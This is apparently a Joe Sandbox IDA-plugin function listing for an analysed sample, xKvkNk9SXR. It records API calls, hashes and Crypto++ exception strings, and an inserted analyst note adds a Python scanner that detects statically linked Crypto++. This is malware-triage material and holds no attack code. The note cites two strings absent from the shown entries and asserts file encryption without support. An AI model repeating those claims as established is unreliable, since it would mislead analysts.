                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: CipherModeBase: feedback size cannot be specified for this cipher mode$w#G!
                                          • API String ID: 2005118841-1771683453
                                          • Opcode ID: 4de1247e66252b5eba2500d702a73df219adfa9babc802507186fb3cc870e170
                                          • Instruction ID: cdcd0234568c21fd6e6c3bdb5fa2858df0f204acff4f707dcee1cb64098f5ab9
                                          • Opcode Fuzzy Hash: 4de1247e66252b5eba2500d702a73df219adfa9babc802507186fb3cc870e170
                                          • Instruction Fuzzy Hash: EA017C71A00148EBCB04DF50CA81FAEBBF8FB18714F2045A9E811A7680DB31EA05CBA0
                                          APIs
                                          • ___crtAcquireSRWLockExclusive.LIBCPMT ref: 00A847BD
                                          • ___crtAcquireSRWLockExclusive.LIBCPMT ref: 00A847D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AcquireExclusiveLock___crt
                                          • String ID: w#G!
                                          • API String ID: 4204951410-519468572
                                          • Opcode ID: 9b2d35d0db0d71240e5bbfbd1c99910e88db4e3aca69bf40726557a90d322f4a
                                          • Instruction ID: 0a462c2201fc7228c7d01b9b9c9b7dc9bb535029c98fc2cab6a8db1f7ebaf1d8
                                          • Opcode Fuzzy Hash: 9b2d35d0db0d71240e5bbfbd1c99910e88db4e3aca69bf40726557a90d322f4a
                                          • Instruction Fuzzy Hash: 15016D79605266978768EF5CF9408E277E9EB4A720314856BE942CB740CB34EC42CB80
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,00A7E74B,00A7E74B,?,?), ref: 00A73451
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx$w#G!
                                          • API String ID: 2568140703-1436762660
                                          • Opcode ID: 43e940ca74ec7394366ddd8c46a376496583818435f8de072a965ac7390c98e2
                                          • Instruction ID: 9edf9a49be15c097ddc63400f6fc94c15237397de74787141747b6895a09c448
                                          • Opcode Fuzzy Hash: 43e940ca74ec7394366ddd8c46a376496583818435f8de072a965ac7390c98e2
                                          • Instruction Fuzzy Hash: 71012532640208BBCF029FA0CD01DEE3FB6FF18751F018524FE1866160CA728A31EB80
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009E66FA
                                          Strings
                                          • AllocatorBase: requested size would cause integer overflow, xrefs: 009E66D1
                                          • w#G!, xrefs: 009E6684
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: AllocatorBase: requested size would cause integer overflow$w#G!
                                          • API String ID: 2005118841-2993062273
                                          • Opcode ID: fde31e7a95d8b96b8ee2836f4620c6dbde9708668af43b7a326f9c6d89810104
                                          • Instruction ID: fdf359637651dd4bcbda280e48b1d1bd3343e08cfec7b70280a0a933508df871
                                          • Opcode Fuzzy Hash: fde31e7a95d8b96b8ee2836f4620c6dbde9708668af43b7a326f9c6d89810104
                                          • Instruction Fuzzy Hash: 5301B172D04688ABDB15EBA0DD42FDEB7BCF718B50F104A6AEC11A3780EB35AD04C650
                                          APIs
                                          • GetDateFormatW.KERNEL32(00000000,-00000004,00000000,00000000,00000000,?,?,?,00000000,00000000,-00000004,00000000,00A6F133,?,00000000,00000000), ref: 00A73103
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: DateFormat
                                          • String ID: GetDateFormatEx$w#G!
                                          • API String ID: 2793631785-769453984
                                          • Opcode ID: a2472a44b00e52d334cfe43e3f61c388e8e9ddb0a173e50262665a160aa8659e
                                          • Instruction ID: c2df6eeb068b2d9483b449593376a09b89c48cb15ab3f723805cb3d3584dbb43
                                          • Opcode Fuzzy Hash: a2472a44b00e52d334cfe43e3f61c388e8e9ddb0a173e50262665a160aa8659e
                                          • Instruction Fuzzy Hash: 24015A32640208FBCF029F90DD01E9E3F72FF18711F418514FE1855160DA728A72EB80
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B634E
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B6314
                                          • StreamTransformation: this object doesn't support random access, xrefs: 009B6325
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: StreamTransformation: this object doesn't support random access$w#G!
                                          • API String ID: 3976011213-1960431624
                                          • Opcode ID: 49b286942f560ef575a5f4b110e307df6b657d09c14399fb49e96b1e2f4b1517
                                          • Instruction ID: d8b20b6c8a7c53fb19a2ed460f98ceb344e37f1dca8044931e4430e71424330a
                                          • Opcode Fuzzy Hash: 49b286942f560ef575a5f4b110e307df6b657d09c14399fb49e96b1e2f4b1517
                                          • Instruction Fuzzy Hash: 24F03071910208ABC701EFA5DD42FDEB7FCFB08710F504565B911A3690DB75AE048A60
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B686E
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B6834
                                          • GeneratableCryptoMaterial: this object does not support key/parameter generation, xrefs: 009B6845
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: GeneratableCryptoMaterial: this object does not support key/parameter generation$w#G!
                                          • API String ID: 3976011213-2833122217
                                          • Opcode ID: 31fd8eb88b59f1f52176346fde71b0f776534c6dc22c5abd5cc04efccba60212
                                          • Instruction ID: e073b85ec0c9eb4963aa5661a6b21adf1a1b5589cac4eac4315d6f524b8482b1
                                          • Opcode Fuzzy Hash: 31fd8eb88b59f1f52176346fde71b0f776534c6dc22c5abd5cc04efccba60212
                                          • Instruction Fuzzy Hash: ADF06D71A00208ABC704EFA4CD42F9DB7F8FB09714F6045A5E411A7290DB31AD04CB50
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B64EE
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B64B4
                                          • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 009B64C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: RandomNumberGenerator: IncorporateEntropy not implemented$w#G!
                                          • API String ID: 3976011213-434694297
                                          • Opcode ID: 8a4fb62b664233c9e2df3f9806b6fbe1496f1fa72250636542f52143658031c6
                                          • Instruction ID: b5da25b6d49333dd33098c5524b8f74997aed15ccb9315fcdf37de9f8576ddca
                                          • Opcode Fuzzy Hash: 8a4fb62b664233c9e2df3f9806b6fbe1496f1fa72250636542f52143658031c6
                                          • Instruction Fuzzy Hash: 09F03A71940608EBC701EBA5CD42FDEB7FCFB08B14F5106A5A921A3690DB35AA04CA90
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B62C4
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B6274
                                          • : this object doesn't support resynchronization, xrefs: 009B6295
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: : this object doesn't support resynchronization$w#G!
                                          • API String ID: 3976011213-2861801057
                                          • Opcode ID: 744a2fd64639d3062f74513c0dfff01a03d4da63d42291f2e9bfcc617079a458
                                          • Instruction ID: e21bb22dcba45a456aff28c597110a798a22bba9176dabbf8356823caa690499
                                          • Opcode Fuzzy Hash: 744a2fd64639d3062f74513c0dfff01a03d4da63d42291f2e9bfcc617079a458
                                          • Instruction Fuzzy Hash: E7F03C71900248ABCB01EBA4CE45FCEBBF8BB09704F104665B515E7691EB75AA08CB91
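                                           Analyst note on the entries above: the exception texts recorded in their Strings fields (PK_MessageEncodingMethod: this signature scheme does not support message recovery; RandomNumberGenerator: IncorporateEntropy not implemented; CipherModeBase: feedback size cannot be specified for this cipher mode; StreamTransformation: this object doesn't support random access; GeneratableCryptoMaterial: this object does not support key/parameter generation; AllocatorBase: requested size would cause integer overflow; and the suffixes ": this object cannot use a null IV" and ": this object doesn't support resynchronization") are verbatim Crypto++ exception messages, so the sample carries a statically linked copy of Crypto++ for its cryptography. The following scanner is an added example for triage, not code from the Joe Sandbox report or from the sample: it searches a dump or PE image for exactly these messages, returns their offsets and the Crypto++ class names they expose, and produces a verdict only when several distinct messages are present. The "w#G!" string that appears in every function entry is not a Crypto++ message and is deliberately not used as a marker. The input blob in the block is constructed for the demonstration, not taken from the real sample.

```python
"""
Identify a statically linked Crypto++ by its exception strings in a memory
dump or PE image.

Added analyst example; not part of the Joe Sandbox report or the sample's code.
The message list is copied from the Strings fields of the function entries above.
"""
import re
from dataclasses import dataclass

# Exception messages observed in the dump. All are verbatim Crypto++ texts;
# the two that start with ": " are suffixes Crypto++ prepends with the
# algorithm name at runtime, so they are matched as bare suffixes here.
CRYPTOPP_MESSAGES = (
    b"PK_MessageEncodingMethod: this signature scheme does not support message recovery",
    b"RandomNumberGenerator: IncorporateEntropy not implemented",
    b"CipherModeBase: feedback size cannot be specified for this cipher mode",
    b"StreamTransformation: this object doesn't support random access",
    b"GeneratableCryptoMaterial: this object does not support key/parameter generation",
    b"AllocatorBase: requested size would cause integer overflow",
    b": this object cannot use a null IV",
    b": this object doesn't support resynchronization",
)

# "<ClassName>: <message>" pattern used only to list the class names Crypto++
# leaks through its exception text. It is a hint, never the verdict.
_CLASS_MSG_RE = re.compile(rb"([A-Z][A-Za-z0-9_]{3,40}): [^\x00]{8,120}")


@dataclass(frozen=True)
class Hit:
    offset: int
    message: bytes


def find_cryptopp_markers(data: bytes) -> list[Hit]:
    """Return every known Crypto++ exception string in data, sorted by offset."""
    hits: list[Hit] = []
    for msg in CRYPTOPP_MESSAGES:
        start = 0
        while (idx := data.find(msg, start)) != -1:
            hits.append(Hit(idx, msg))
            start = idx + 1
    return sorted(hits, key=lambda h: h.offset)


def cryptopp_classes(data: bytes) -> set[str]:
    """Class names exposed as '<Class>: message' prefixes in the blob."""
    return {m.group(1).decode("ascii") for m in _CLASS_MSG_RE.finditer(data)}


def classify(data: bytes, min_hits: int = 3) -> str:
    """'cryptopp' when at least min_hits distinct known messages are present,
    'possible-cryptopp' for one or two, otherwise 'unknown'."""
    distinct = {h.message for h in find_cryptopp_markers(data)}
    if len(distinct) >= min_hits:
        return "cryptopp"
    if distinct:
        return "possible-cryptopp"
    return "unknown"


# Constructed test blob (NOT the real sample): a handful of NUL-terminated
# strings surrounded by filler, mimicking an MSVC .rdata layout. The "w#G!"
# and "GetTimeFormatEx" strings are included to show they are ignored.
SAMPLE = (
    b"MZ\x90\x00" + b"\xcc" * 32
    + b"RandomNumberGenerator: IncorporateEntropy not implemented\x00"
    + b"\x90" * 7
    + b": this object cannot use a null IV\x00"
    + b"AllocatorBase: requested size would cause integer overflow\x00"
    + b"w#G!\x00"
    + b"GetTimeFormatEx\x00"
)

if __name__ == "__main__":
    # Typical use: open("dump.sdmp", "rb").read() in place of SAMPLE.
    for hit in find_cryptopp_markers(SAMPLE):
        print(f"0x{hit.offset:08x}  {hit.message.decode()}")
    print("classes:", sorted(cryptopp_classes(SAMPLE)))
    print("verdict:", classify(SAMPLE))
```

                                           Run it over the `.sdmp` files listed under Memory Dump Source (or over the PE itself) instead of `SAMPLE`. The verdict threshold is deliberately conservative: a single shared error string can come from a bundled third-party component, but half a dozen distinct Crypto++ exception messages in one image mean the library is linked in and the file encryption is implemented with it, which is what the `__CxxThrowException@8` entries above are throwing.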
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _abort
                                          • String ID: w#G!$w#G!
                                          • API String ID: 1888311480-1134387879
                                          • Opcode ID: 004bac969265009b68020d95a49bb6cbd3d48f267362cb3e3bcd8d0e9269d0e8
                                          • Instruction ID: 72613ba0921e172205f41abfac7a2278bb3c84876d1e1900c43e77bd2e026e30
                                          • Opcode Fuzzy Hash: 004bac969265009b68020d95a49bb6cbd3d48f267362cb3e3bcd8d0e9269d0e8
                                          • Instruction Fuzzy Hash: 6AF0B432911704EBC714EFF5EE16E5D3772A700B20F118226F1159F1D1DB305C428B41
                                          APIs
                                          • GetTimeFormatW.KERNEL32(00000000,-00000004,00000000,00000000,00000000,?,?,?,00000000,00000000,-00000004,00000000,00A6F133,?,00000000,00000000), ref: 00A73233
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FormatTime
                                          • String ID: GetTimeFormatEx$w#G!
                                          • API String ID: 3606616251-2072928690
                                          • Opcode ID: 38a9f18c5f9869e1721873706ffdcfe838a0de539a7c8fcdcaa93bcae5eb9df9
                                          • Instruction ID: 5bc9fa236f1b589a9bc6ba948f2f7a60d8dd5ae456cf2faf34f4d9d956ec75af
                                          • Opcode Fuzzy Hash: 38a9f18c5f9869e1721873706ffdcfe838a0de539a7c8fcdcaa93bcae5eb9df9
                                          • Instruction Fuzzy Hash: 20F0AF32640208BBCF02AF91DC06EAF7FA5EB18710F128125FD0996261CA718B21EBC1
                                          APIs
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A4EE5F
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4EE6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                          • String ID: pContext
                                          • API String ID: 1687795959-2046700901
                                          • Opcode ID: 2983b7d938498f2138a003812ece63c2d6fd10f5721adae5bc2775f21fa2aeb0
                                          • Instruction ID: c57b287461bdd3339bd9fd21e8828d9df8591b37a16f3d5e8e8b9b8b93e55271
                                          • Opcode Fuzzy Hash: 2983b7d938498f2138a003812ece63c2d6fd10f5721adae5bc2775f21fa2aeb0
                                          • Instruction Fuzzy Hash: 69F0BB39700214778B04EB95D845C5EB7BDAF88B647014469E911A7351DF70DD018BD0
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B659E
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • BufferedTransformation: this object is not attachable, xrefs: 009B6575
                                          • w#G!, xrefs: 009B6564
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: BufferedTransformation: this object is not attachable$w#G!
                                          • API String ID: 3976011213-543208889
                                          • Opcode ID: 6734b6791e7325d63df6cd89f7395dfae97507a19a1590abaf48c8e8e6315edf
                                          • Instruction ID: 5d2fb2325b5e4cb78eb51799830568f0b06e7035140a312f4a8de457d0b0c417
                                          • Opcode Fuzzy Hash: 6734b6791e7325d63df6cd89f7395dfae97507a19a1590abaf48c8e8e6315edf
                                          • Instruction Fuzzy Hash: A1F03071900648ABCB05EBA1CE42FDEB7FCFB08714F500A65A521B31D0DB756A088A51
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B4E7E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: $$w#G!
                                          • API String ID: 2659868963-638371399
                                          • Opcode ID: 165b973efd03917e5b6fe87bb0661b873255925229f305fcb5904f0c69e33c89
                                          • Instruction ID: ca2b782788f2e727ac7a7d5c9be91a57ebfb4fc41cee1e19c6179b6664eb36d7
                                          • Opcode Fuzzy Hash: 165b973efd03917e5b6fe87bb0661b873255925229f305fcb5904f0c69e33c89
                                          • Instruction Fuzzy Hash: 3301A2708107488FCB10DFA9D54479EFBF8AF19304F50825DD58567341E7B4AA88CBE1
                                          APIs
                                          • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00A7DE3A,?,00000055,00000050), ref: 00A73294
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: DefaultUser
                                          • String ID: GetUserDefaultLocaleName$w#G!
                                          • API String ID: 3358694519-3370358545
                                          • Opcode ID: f36054c204a02f3b1ef321e921c9602e191553028c8c11dded53d3684e710b00
                                          • Instruction ID: 53e10a4be6368515aad8472df099e98bfbaaaa61af52dea871377ea3f64ba9c0
                                          • Opcode Fuzzy Hash: f36054c204a02f3b1ef321e921c9602e191553028c8c11dded53d3684e710b00
